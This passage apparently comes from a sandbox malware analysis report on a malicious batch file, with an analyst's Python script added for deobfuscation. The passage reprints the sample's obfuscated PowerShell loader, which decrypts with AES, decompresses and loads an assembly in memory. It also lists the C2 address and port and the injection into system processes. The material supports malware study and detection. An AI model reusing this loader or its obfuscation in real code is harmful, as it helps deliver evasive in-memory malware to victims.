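environment gate: it returns exit code 900 only when a Win32_DiskDrive model contains 'wds100t2b0a' and F:\ holds no files, and exit code 1 otherwise. The Python below (the function names, the OBF regex and the SAMPLE constant are mine; SAMPLE is the ixmy/ealu/asdm text copied from the report's process-creation line) inlines every wrapper and extracts the cipher parameters. One caveat: the report prints the command line entirely in lower case, so the base64 key and IV as shown cannot be the real values; their decoded lengths (32 and 16 bytes, so AES-256-CBC) survive the case change, the key bytes do not.

```python
"""Recover the plain PowerShell from the .replace('<junk>', '') loader above.

Added analyst tooling, not part of the Joe Sandbox report or of the sample.
SAMPLE is copied from the report's process-creation line, which prints the
command line in lower case: the base64 key/IV in it are therefore
case-mangled and will not decrypt the real payload, only their sizes hold.
"""
import base64
import re

# Constructed input: the ixmy/ealu/asdm functions, copied from the report.
SAMPLE = (
    "function ixmy($rtjl){ "
    """invoke-expression -verbose '$lyya=[kqskqykqstkqekqm.kqskqekqckqukqrkqikqtkqykq.kqcrkqykqpkqtokqgrkqakqphkqykq.kqaekqskq]:kq:ckqrkqekqakqtekq(kq);'.replace('kq', ''); """
    """invoke-expression -warningaction inquire -debug -informationaction ignore -verbose '$lyya.m7ko7kd7ke=7k[7ksy7ks7kt7ke7km7k.7ks7ke7kc7ku7kri7kt7ky7k.c7kry7kp7kto7kg7kr7kap7kh7ky.7kci7kp7kh7ke7krm7ko7kd7ke]7k:7k:c7kb7kc;'.replace('7k', ''); """
    """invoke-expression -informationaction ignore '$lyya.pupaupdupdiupnupg=up[upsupyupsuptupeupmup.upsupecupuuprupitupy.upcupryuppuptupoguprupapuphyup.uppupaupddupiupnupgmupoupdeup]up::uppupkupcups7up;'.replace('up', ''); """
    """invoke-expression -verbose '$lyya.kf4ef4yf4=[f4sf4ysf4tf4ef4mf4.f4cf4of4nf4vf4ef4rtf4]f4:f4:ff4rof4mf4baf4sf4ef464f4sf4trf4inf4g("6f4if4nf4qtf4vf4f6f4kf4mf4ff4if4uf49f40f4mf4wf4kaf4zf48f4tdf482f4bf4ytf4df4cf4hnf4rf4psf4bff42f4gf4ff4mff4qf4=");'.replace('f4', ''); """
    """invoke-expression -debug -verbose -informationaction ignore -warningaction inquire '$lyya.icuvcu=cu[scuycustcuecumcu.cuccuocuncuvcuecurcut]cu:cu:cufrcuomcubcuascuecu6cu4scutcuricungcu("ocuqcufcuescuocubxcu6cufcuucuhcuocugcu2cuocu+cubrcu8curcuq=cu=");'.replace('cu', ''); """
    "$kxiy=$lyya.createdecryptor(); $uoeq=$kxiy.transformfinalblock($rtjl, 0, $rtjl.length); "
    "$kxiy.dispose(); $lyya.dispose(); $uoeq;}"
    "function ealu($rtjl){ "
    """invoke-expression -debug -verbose -warningaction inquire -informationaction ignore '$qquu=ngzegzwgz-ogzbgzjegzcgztgz gzsgzygzsgztgzegzmgz.igzogz.gzmegzmogzrgzysgztgzrgzeagzm(,$rtjl);'.replace('gz', ''); """
    """invoke-expression -warningaction inquire '$jlmq=ngzegzwgz-ogzbgzjegzcgztgz gzsgzygzsgztgzegzmgz.igzogz.gzmegzmogzrgzysgztgzrgzeagzm;'.replace('gz', ''); """
    """invoke-expression -debug -warningaction inquire -verbose -informationaction ignore '$fcom=njvejvwjv-ojvbjvjejvcjvtjv jvsjvyjvsjvtjvejvmjv.ijvojv.jvcojvmpjvrjvesjvsjvijvonjv.jvgzjvipjvsjvtjvrjveajvmjv($qquu, [jvijvojv.cjvojvmpjvrjvejvsjvsjvijvojvnjv.jvcjvomjvpjvrjvesjvsijvojvnmjvojvdjve]jv:jv:djvecjvojvmjvpjvrejvsjvs);'.replace('jv', ''); """
    "$fcom.copyto($jlmq); $fcom.dispose(); $qquu.dispose(); $jlmq.dispose(); $jlmq.toarray();}"
    "function asdm($rtjl,$dnwr){ "
    """invoke-expression -informationaction ignore -verbose -debug '$umjh=[imsimyimstimeimm.imrimeimfimlimeimcimtimiimoimn.imaimsimseimmbimlimy]im:im:imloimaimd([byte[]]$rtjl);'.replace('im', ''); """
    """invoke-expression -informationaction ignore -verbose -warningaction inquire -debug '$mtqh=$umjh.eianiatiaryiapiaoiianiatia;'.replace('ia', ''); """
    """invoke-expression -verbose -informationaction ignore -warningaction inquire -debug '$mtqh.7yi7yn7yvo7yk7ye(7y$7yn7yu7yl7yl7y, $dnwr);'.replace('7y', '');}"""
)

# One wrapper: invoke-expression [switches] '<payload>'.replace('<junk>', '')
OBF = re.compile(
    r"invoke-expression(?:\s+-\w+(?:\s+\w+)?)*\s+'([^']*)'\.replace\('([^']+)',\s*''\)\s*;?"
)


def decode_statement(payload: str, junk: str) -> str:
    """Do exactly what the loader does at runtime: delete every junk token."""
    return payload.replace(junk, "")


def decoded_statements(script: str) -> list[str]:
    """Every obfuscated statement in source order, decoded."""
    return [decode_statement(p, j) for p, j in OBF.findall(script)]


def deobfuscate(script: str) -> str:
    """The script with each invoke-expression/.replace wrapper inlined."""
    return OBF.sub(lambda m: decode_statement(m.group(1), m.group(2)) + " ", script)


def aes_params(script: str) -> dict:
    """Cipher mode, padding and key/IV sizes used by the decrypt routine."""
    text = deobfuscate(script)

    def grab(pattern: str):
        m = re.search(pattern, text)
        return m.group(1) if m else None

    key = grab(r'\.key=\[system\.convert\]::frombase64string\("([^"]+)"\)')
    iv = grab(r'\.iv=\[system\.convert\]::frombase64string\("([^"]+)"\)')
    return {
        "mode": grab(r"\.mode=\[system\.security\.cryptography\.ciphermode\]::(\w+)"),
        "padding": grab(r"\.padding=\[system\.security\.cryptography\.paddingmode\]::(\w+)"),
        # Sizes survive the report's case mangling even though the bytes do not.
        "key_len": len(base64.b64decode(key)) if key else None,
        "iv_len": len(base64.b64decode(iv)) if iv else None,
    }


if __name__ == "__main__":
    for stmt in decoded_statements(SAMPLE):
        print(stmt)
    print(aes_params(SAMPLE))
```

Run it as-is to print the decoded statements. On a live capture, the same pass over the original, case-preserved command line gives the real key and IV; AES-CBC decrypting and then gunzipping the blob that the batch hands to ixmy yields the .NET assembly that asdm loads into the PowerShell process.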
Source: conhost.exe, 00000005.00000002.2523666714.0000026405DE1000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.2568365283.0000015206321000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000011.00000000.1495603733.000001B9280E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000005.00000002.2523666714.0000026405DE1000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.2568365283.0000015206321000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000011.00000000.1495603733.000001B9280E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: conhost.exe, 00000005.00000002.2523666714.0000026405DE1000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.2568365283.0000015206321000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000011.00000000.1495603733.000001B9280E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program ManagerW
Source: conhost.exe, 00000005.00000002.2523666714.0000026405DE1000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.2568365283.0000015206321000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000011.00000000.1495603733.000001B9280E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: dwm.exe, 00000014.00000002.2633502776.000001F086CA8000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000014.00000000.1514567480.000001F086CA8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Program Managerz
Source: C:\Windows\System32\cmd.exe | Code function: 4_3_000001B780BC45D0 cpuid 4_3_000001B780BC45D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Device\v4.0_4.0.0.0__b77a5c561934e089\System.Device.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\Windows\System32\Tasks\$nya-mPeY5dGd VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\Windows\System32\Tasks\$nya-mPeY5dGd VolumeInformation
Source: C:\Windows\System32\cmd.exe | Code function: 4_2_000001B780BE9070 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_000001B780BE9070
MITRE ATT&CK Matrix (rebuilt from the flattened table; a bracketed figure is the report's count badge for that technique, reproduced exactly as extracted; entries without a badge had no matching signature)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Scripting [1]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation [121]; Command and Scripting Interpreter [2]; Scheduled Task/Job [1]; PowerShell [1]; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: Scripting [1]; DLL Side-Loading [1]; Scheduled Task/Job [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading [1]; Process Injection [712]; Scheduled Task/Job [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; DLL Side-Loading [1]; Rootkit [4]; Masquerading [11]; Modify Registry [1]; Virtualization/Sandbox Evasion [131]; Process Injection [712]; Hidden Files and Directories [2]
Credential Access: Credential API Hooking [1]; Input Capture [121]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery [1]; File and Directory Discovery [2]; System Information Discovery [133]; Security Software Discovery [131]; Virtualization/Sandbox Evasion [131]; Process Discovery [3]; Application Window Discovery [1]; System Network Configuration Discovery [1]; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data [1]; Credential API Hooking [1]; Input Capture [121]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [11]; Non-Standard Port [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [13]; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1631966; Sample: skf7iF4.bat; Start date: 07/03/2025; Architecture: WINDOWS; Score: 100)

Top-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Yara detected Powershell decrypt and execute; 6 other signatures

Process tree (text rendering of the graph; "injected" marks processes the graph shows as targets of code injection rather than as children started by the parent):

cmd.exe (started): Suspicious powershell command line found
    conhost.exe (started)
    powershell.exe (started): Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
        cmd.exe (started): Suspicious powershell command line found
            powershell.exe (started): Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Hides that the sample has been downloaded from the Internet (zone.identifier); 3 other signatures
                connects to 176.65.144.14 TCP 4567 (local port 49687), PALTEL-ASPALTELAutonomousSystemPS, Germany
                connects to ipwho.is 195.201.57.90 TCP 443 (local port 49690), HETZNER-ASDE, Germany
                winlogon.exe (injected): Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures
                    lsass.exe (injected): Writes to foreign memory regions
                        svchost.exe (injected): connects to pki-goog.l.google.com 172.217.16.131 TCP 80 (local port 49691), GOOGLEUS, United States
                    svchost.exe (injected): System process connects to network (likely due to code injection or exploit)
                    svchost.exe (injected): resolves ipwho.is, c.pki.goog, pki-goog.l.google.com
                    26 other processes (injected)
            powershell.exe (started)
                findstr.exe (started)
            more.com (started)
            2 other processes

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.